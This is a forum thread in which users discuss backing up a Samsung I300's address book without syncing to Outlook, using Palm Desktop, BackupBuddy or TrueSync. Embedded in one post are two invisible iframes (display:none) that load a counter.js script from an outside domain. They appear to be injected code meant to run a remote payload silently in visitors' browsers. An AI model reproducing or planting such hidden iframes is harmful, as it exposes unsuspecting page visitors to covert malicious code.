+ Reply to Thread

Don't *have* to sync with Outlook

Well, you don't have to sync with MS Lookout then. You can always sync with the Palm Desktop instead and have your contacts, memo, todo and calendar backed up there. I only use the Palm Desktop as a backup myself.

Hmm... I don't remember where, but in Outlook, you don't have to add every single person who emails you to your address book. There's a setting to turn that off that 'bug' somewhere in Microserf's software.

Finally, back in my Palm III days, there wasn't any backup feature in the Palm Hotsync Manager. I used a palm software called BackupBuddy to backup all the software & databases, including the address book. It's saved me from having to reenter data lots of times, and i still use it even today.

Backing up the I300? (and ready to toss it out the window)

Ok I'm ready to throw my I300 out the window. I was using Blazer and it locked up. I took the battery out and put it back in and the phone reset. Of course it torched all of my addressbook entries. Yeah, it would have been so expensive to put flash memory in to save this stuff--I mean hell 128MB of flash memory is $40 in quantities of one. So yeah that's totally understandable, Samsung. NOT!

Anyway--apparently hotsync backed everything up EXCEPT my addressbook. So I'm sitting here re-rentering all my phone numbers in-between strong urges to toss this thing off the balcony.

I think the reason why my address entries weren't backed up is because I have my mail and contacts synching turned off.

The problem is this. I don't want to sync with outlook. I have all this crap in my outlook addressbook because it puts everybody I ever emailed in it. I would like to keep my outlook contacts separate from my palm ones. But there doesn't seem to be a way to save my addressbook without synching it to outlook. Is there?

Either way this is completely unacceptable. As soon as a better PDA/phone hybrid comes out I'm jumping ship. There's just no way I can have my contacts under thread of being entirely erased because of a buggy program. That is outrageous.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Great, how do I set it to backup to the palm desktop? For the life of me I have not been able to get it to do that.

When you first install the Palm desktop, it should be set up to sync with it. Don't install PocketMirror (which is what syncronizes the Palm device with Outlook)

Worst case, you can download TrueSync (goto Yahoo and search for TrueSync) for free from Yahoo! and use that instead. It allows for syncronization between multiple devices and programs, and allows you to force delete & overwrite for each sync